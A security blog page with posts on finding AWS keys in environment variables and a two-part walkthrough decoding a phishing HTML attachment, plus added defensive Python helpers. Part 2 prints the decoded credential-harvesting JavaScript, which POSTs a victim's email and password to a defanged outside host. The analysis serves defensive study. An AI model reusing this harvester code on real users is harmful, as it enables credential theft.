BRNDR

Stuff, things and computers.

Finding AWS CLI Secrets in Environment Variables

June 15, 2022 by BRNDR

While playing around with Hashicorp’s Terraform tutorial, I realized that I was being led to store the secrets used to access my AWS account as local environment variables.

My first question was how to retrieve them, because if I can, so can anyone else who gains access to your machine; reading them doesn’t require admin access. How many devs are storing their production keys as a local environment variable? You could leverage your EDR solution or create a PowerShell script to test for their existence.

This script will let you return the secrets using a simple one-liner in PowerShell.

There has to be a better way; stay tuned for a future post.
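As an added example (not the post’s PowerShell script), here is a Python version of the existence check the post describes: it looks for the AWS CLI credential variables named in the linked AWS docs, masks their values so the report itself never leaks a key, and notes whether the access key looks like a long-term IAM user key (AKIA prefix) or a temporary STS key (ASIA prefix). The sample environment is constructed and uses AWS’s documented example key ID.

```python
import os

# Credential variables read by the AWS CLI (names from the linked AWS docs).
AWS_CRED_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def mask(value: str, keep: int = 4) -> str:
    """Keep only a short prefix so the audit output never contains the secret."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def classify_key_id(key_id: str) -> str:
    """AKIA... is a long-term IAM user key; ASIA... is a temporary STS key."""
    if key_id.startswith("AKIA"):
        return "long-term"
    if key_id.startswith("ASIA"):
        return "temporary"
    return "unknown"


def find_aws_env_secrets(env) -> dict:
    """Report which AWS credential variables are set, without exposing them."""
    present = {name: mask(env[name]) for name in AWS_CRED_VARS if env.get(name)}
    key_type = classify_key_id(env["AWS_ACCESS_KEY_ID"]) if "AWS_ACCESS_KEY_ID" in present else None
    # A long-term key sitting in the environment is the case the post warns about:
    # anyone who can read this process's environment gets persistent account access.
    if key_type == "long-term":
        risk = "high"
    elif present:
        risk = "medium"
    else:
        risk = "none"
    return {"present": present, "key_type": key_type, "risk": risk}


# Constructed sample environment (AWS's documented example key ID, fake secret).
SAMPLE_ENV = {
    "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_ACCESS_KEY": "constructed-not-a-real-secret",
    "PATH": "/usr/bin",
}

if __name__ == "__main__":
    # Check the constructed sample first, then the real environment of this process.
    for label, env in (("sample", SAMPLE_ENV), ("this process", os.environ)):
        report = find_aws_env_secrets(env)
        print(label, report["risk"], report["key_type"], sorted(report["present"]))
```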

Resource: https://docs.aws.amazon.com/cli/v1/userguide/cli-configure-envvars.html

Filed Under: Uncategorized Tagged With: aws, cli, secrets, terraform

Going Down the MalDoc Rabbit Hole – Part 2

January 17, 2022 by BRNDR

This is a continuation of our first post in this series where we are trying to decode the HTML sent to us in a malicious file.

Decoded but still obscure

Glancing at the code block left over after running it through CyberChef, it still isn’t clear what this document is trying to do. Let’s take a closer look. If you paste it into your text editor, it will appear on one line. CyberChef also has an option called JavaScript Beautify which puts the code into a more human-readable format.

Below we will break the code into segments to try and better understand what is going on. I removed the stuff we aren’t interested in to help clarify what is happening here. You don’t have to be a master in JavaScript to understand what is going on, but it helps to know some basics.

var earth = 'brndr[@]somecompany[.]com';
var uri = 'http:[//]test[.]santandreadescaphis[.]com/wp-includes/ID3/img_000054[.]php?1807-9248';
var key = decodeURIComponent(uri);
var bml = document.getElementById('myImageID').src = 'https:[//]api[.]statvoo[.]com/favicon/?url=somecompany[.]com';
const img = document.getElementById('banner');
img.src = bml;
var max = document.getElementById('car');
max.src = bml;

This first block sets up the variables used later in the script.

  • earth = the email address this doc was sent to
  • uri = the website presumably used to stage the attack or phish
  • key = decodes the URI; this is irrelevant now, as we already decoded the URI in CyberChef
  • bml = uses a legitimate website to fetch the favicon of the domain the email address belongs to. If you replace it with something like facebook[.]com, it redirects to a cached image in Google. This is just trying to make the phishing attempt feel more authentic.

var email = earth, PASS = document.getElementById('password'), PASSX = document.getElementById('passwordx'), PASSY = document.getElementById('passwordy');
$('#password').focus();
var displayName = $('#displayName');
displayName.attr('value', email), displayName.html(email), $('#password').keyup(function (e) {
	13 == e.which && $('#Tombol1').click();
}), $('#passwordx').keyup(function (e) {
	13 == e.which && $('#Tombol2').click();
}), $('#passwordy').keyup(function (e) {
	13 == e.which && $('#Tombol3').click();
});
var Tombol1 = $('#Tombol1');
Tombol1.click(function (e) {
	e.preventDefault();
	e = $('#password').val();
	$.ajax({
		url: key,
		type: 'POST',
		dataType: 'html',
		beforeSend: function () {
			$('#loader').show();
		},
		data: {
			u: email,
			p: e
		},
		

This code block is starting to look more and more like a credential harvesting attempt. The document captures the email and password fields from a fake sign-in form and uses AJAX to POST them to the website being loaded on the backend.

crossDomain: !0,
		success: function (e) {
			$('#loader').hide(), 'VALID' == e ? ($('.FORM1').hide(), $('.Finish').show(), window.location.replace('https://outlook.office.com/')) : 'KURANG' == e ? (PASS.value = '', PASS.focus(), $('#pass').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#error').empty(), $('#error').show(), $('#error').append("<span style='color:#FF0000;'>Your account or password is incorrect. If you don't remember your password,</span><a style='color:#0066ff; href=''>reset it now</a>.")) : 'KOSONG' == e && (PASS.value = '', PASS.focus(), $('#pass').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#error').empty(), $('#error').show(), $('#error').append('Please enter the password<br>'));
		},
		error: function (e) {
			console.log(e);
		}
	});
}), (displayName = $('#displayNamey')).attr('value', email), displayName.html(email);
var Tombol3 = $('#Tombol3');
Tombol3.click(function (e) {
	e.preventDefault();
	e = $('#passwordy').val();
	$.ajax({
		url: key,
		type: 'POST',
		dataType: 'html',
		beforeSend: function () {
			$('#loadery').show();
		},
		data: {
			u: email,
			p: e
		},
		crossDomain: !0,
		success: function (e) {
			$('#loadery').hide(), 'VALID' == e ? ($('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').hide(), $('.Finish').show(), window.location.replace('https://outlook.office.com/')) : 'KURANG' == e ? (PASSY.value = '', PASSY.focus(), $('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').show(), $('#passy').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#errory').empty(), $('#errory').show(), $('#errory').append('Sign in attempt timeout, verify your password<br>')) : 'KOSONG' == e && (PASSY.value = '', PASSY.focus(), $('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').show(), $('#passy').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#errory').empty(), $('#errory').show(), $('#errory').append('Please enter the password<br>'));
		},
		error: function (e) {
			console.log(e);
		}
	});
});
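As an added example (not code from the post or from the maldoc), here is a small static triage routine in Python that pulls out of the decoded script the three things the walkthrough above reads off by hand: the endpoint the AJAX call POSTs to (resolving `url: key` back through `decodeURIComponent(uri)` to the literal), the field names being posted, and the redirect the success handler performs. The sample script is a constructed excerpt condensed from the one above, with the indicators kept in the post’s defanged form.

```python
import re

# Constructed excerpt condensed from the decoded script in this post, indicators kept defanged.
SAMPLE_JS = """
var earth = 'brndr[@]somecompany[.]com';
var uri = 'http:[//]test[.]santandreadescaphis[.]com/wp-includes/ID3/img_000054[.]php?1807-9248';
var key = decodeURIComponent(uri);
var email = earth, PASS = document.getElementById('password');
$.ajax({ url: key, type: 'POST', dataType: 'html', data: { u: email, p: e },
    success: function (e) { 'VALID' == e && window.location.replace('https://outlook.office.com/'); }
});
"""

_ASSIGN_RE = re.compile(r"\bvar\s+(\w+)\s*=\s*(?:decodeURIComponent\()?('[^']*'|\w+)")


def string_vars(js: str) -> dict:
    """Map variable names to string literals, following one level of aliasing."""
    raw = dict(_ASSIGN_RE.findall(js))
    resolved = {}
    for name, value in raw.items():
        target = raw.get(value, value)  # alias -> the literal it points at
        if target.startswith("'"):
            resolved[name] = target[1:-1]
    return resolved


def triage(js: str) -> dict:
    """Where do credentials go, which fields are posted, where is the victim sent?"""
    names = string_vars(js)
    ajax = re.search(r"\$\.ajax\(\{(.*?)\}\);", js, re.S)
    block = ajax.group(1) if ajax else ""
    url_ref = re.search(r"\burl\s*:\s*(\w+)", block)
    method = re.search(r"\btype\s*:\s*'(\w+)'", block)
    data = re.search(r"\bdata\s*:\s*\{([^}]*)\}", block)
    fields = re.findall(r"(\w+)\s*:", data.group(1)) if data else []
    redirect = re.search(r"window\.location\.replace\('([^']*)'\)", js)
    posts_to = names.get(url_ref.group(1)) if url_ref else None
    # A password-looking field POSTed off-site followed by a bounce to a real
    # login page is the harvesting pattern the post walks through.
    takes_password = any(f.lower() in ("p", "pass", "pwd", "password") for f in fields)
    verdict = "likely credential harvester" if posts_to and takes_password and redirect else "inconclusive"
    return {"posts_to": posts_to, "method": method.group(1) if method else None,
            "posted_fields": fields,
            "redirect_after_success": redirect.group(1) if redirect else None,
            "verdict": verdict}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_JS).items():
        print(f"{k}: {v}")
```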

What Is Happening

Now let’s run this HTML file in our sandbox to see what happens. Since the JavaScript isn’t doing anything other than credential harvesting, I will allow my VM to access the internet to be able to interact with it too. Normally I would advise against this, but this is relatively safe.

Run it in our Sandbox VM

Let’s open the doc in Firefox…

If we click the x it shows us the login prompt, let’s see what happens when we enter a password.

The site spins for a moment and throws the error below. Note that the “Create one!” link is self-referencing and goes nowhere.

Had we entered a real password it would still have failed, but the person who orchestrated the phishing attempt would now have whatever we typed into the password box, harvested by the URL from our code snippet above.

var uri = 'http:[//]test[.]santandreadescaphis[.]com/wp-includes/ID3/img_000054[.]php?1807-9248';

If we plug this URL into our browser, it returns the word KOSONG, which is a town in North Korea. Note that in the script above, KOSONG is the response string the success handler maps to “Please enter the password”, which is what you would expect back from a request that posts no password. This could be a red herring to throw us off the scent, but I think we have reached the end of this rabbit hole. Thanks for reading!

Filed Under: Maldocs

Going Down the MalDoc Rabbit Hole – Part 1

November 2, 2021 by BRNDR

In this article we are going to take a look at a malicious HTML file sent to us by our internet friends. While the presentation and delivery of said file was pretty suspect at the onset, I thought it would make for good practice to see what was actually happening under the covers. Join me in my search for what lies at the bottom…

Pre-requisites

To play it safe I am running the following to make sure I don’t inadvertently infect my machine:

  • VMWare Workstation Player – you can also use VirtualBox or whatever you like to use for running VMs
  • Sandbox VM – I am using REMnux to kick the tires on it. Some may see this as overkill, but you can download the OVA and start it without any pre-installation of tools. Easy wins.
  • Text editor – VSCode is installed and I am familiar with it. This is cross-platform so it will work on Windows, Linux and Mac.

A garbled mess

On first inspection, the file I received, titled invoice_remit-6187.xls.HTML, looked to be a jumble of JavaScript. What is going on here?

Sunday JavaScript Code Jumble

The JavaScript in this document uses the unescape() function, which, simply stated, decodes an encoded URL: it takes all of the percent-encoded text and decodes it. For example, if you have a URL with an ampersand (&) in it, the URL would look like this:

  • Unencoded – sample-site.com/terms&conditions
  • Encoded – sample-site.com/terms%26conditions

where %26 represents the ampersand character.

Now, why would they want to hide something in the JavaScript? While my aspirations of being a web developer were short lived, what I do remember is that document.write takes the unescaped text and writes it into the HTML. This all happens at runtime in your browser; all you have to do is open the file.

CyberChef Enters the Chat

There are lots of resources on CyberChef out there in the wilds of the internet and I urge you to read/watch as many as you can because this is a very useful (free) tool. Our use case is going to be to decode the JavaScript to see what our friends are trying to hide from us.

Since our VM isn’t connected to the internet, download the offline version of CyberChef (gchq.github.io). The download link is at the top right-hand side. Copy this onto a USB drive that you can pass through to your VM. (After doing this I realized REMnux comes with it pre-installed.)

Next, we drag URL Decode from the Favourites section over to the Recipe section.

Go back to the text editor, copy everything between the <Script type="text/javascript"> and </script> sections and paste it into the Input section. If Auto-Bake is checked, it will automatically decode, otherwise hit Bake.

Decode x1

OK, this is weird: it looks like we are starting to see some structure in this file, in the form of CSS to format the page, but there is still a lot of obfuscation going on. Let’s take our Output and run it back through Input.

Maybe there is a better way: instead of copying and pasting the Output back into the Input field, we can add a second URL Decode step to the recipe. Let’s see what happens.

Decode x2

If you have more than one operation in your recipe, the output of the previous step is passed on to the next one as its input. Great, we can see the underlying code, but some of the embedded URLs aren’t quite decoded yet.

Bout ready to decode

There it is; this is about as decoded as we can get using this recipe in CyberChef.

Decode x3
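As an added example (not from the post, the maldoc, or CyberChef itself), here is a Python decoder that does what the stacked URL Decode steps in the recipe did: it pulls the string literal out of unescape(...), applies a JavaScript-style unescape (both %XX and %uXXXX forms) repeatedly until a pass changes nothing, and reports how many layers it took. The sample HTML is constructed by escaping a small form snippet three times, mirroring the three passes the file above needed.

```python
import re

# Matches both %XX byte escapes and the %uXXXX form JavaScript's unescape() accepts.
_ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text: str) -> str:
    """Decode one layer the way the browser's unescape() would (no UTF-8 handling)."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))   # %u0041 -> 'A'
        return chr(int(m.group(2), 16))       # %3C -> '<'
    return _ESCAPE_RE.sub(repl, text)


def decode_until_stable(text: str, max_passes: int = 10):
    """Apply unescape() repeatedly, like stacking URL Decode steps in a CyberChef recipe.
    Stops when a pass changes nothing. Returns (decoded_text, passes_needed).
    Caveat: plaintext that legitimately contains a %XX sequence would be decoded once more."""
    passes = 0
    while passes < max_passes:
        decoded = js_unescape(text)
        if decoded == text:
            break
        text = decoded
        passes += 1
    return text, passes


def extract_unescape_payloads(html: str):
    """Pull the string literals passed to unescape(...) out of a maldoc's script."""
    return re.findall(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", html)


def js_escape(text: str) -> str:
    """Constructed helper to build layered samples: percent-encode every (ASCII) character."""
    return "".join("%%%02X" % ord(c) for c in text)


# Constructed sample: a form snippet escaped three times and wrapped in
# document.write(unescape(...)), mimicking the invoice_remit file's structure.
INNER = '<input id="password" type="password">'
SAMPLE_HTML = ('<script type="text/javascript">document.write(unescape("'
               + js_escape(js_escape(js_escape(INNER))) + '"))</script>')

if __name__ == "__main__":
    for payload in extract_unescape_payloads(SAMPLE_HTML):
        plain, passes = decode_until_stable(payload)
        print(f"{passes} URL Decode passes needed -> {plain}")
```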

Stay tuned for Part 2, where we will look at what this site is doing.

Filed Under: Maldocs Tagged With: cyberchef, maldoc, phishing

Copyright © 2023 - BRNDR